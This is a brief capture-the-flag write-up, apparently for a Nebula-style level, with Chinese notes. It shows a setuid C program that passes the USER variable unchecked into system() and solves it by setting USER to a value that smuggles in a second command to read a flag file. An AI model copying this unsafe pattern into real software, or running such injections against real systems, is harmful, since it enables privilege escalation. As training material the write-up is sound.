About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
Source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
}程序邏輯
輸出環境變量USER很cool
思路
覆蓋環境變量USER
USER=";cat /home/flag02/flag"
/home/flag02/flag02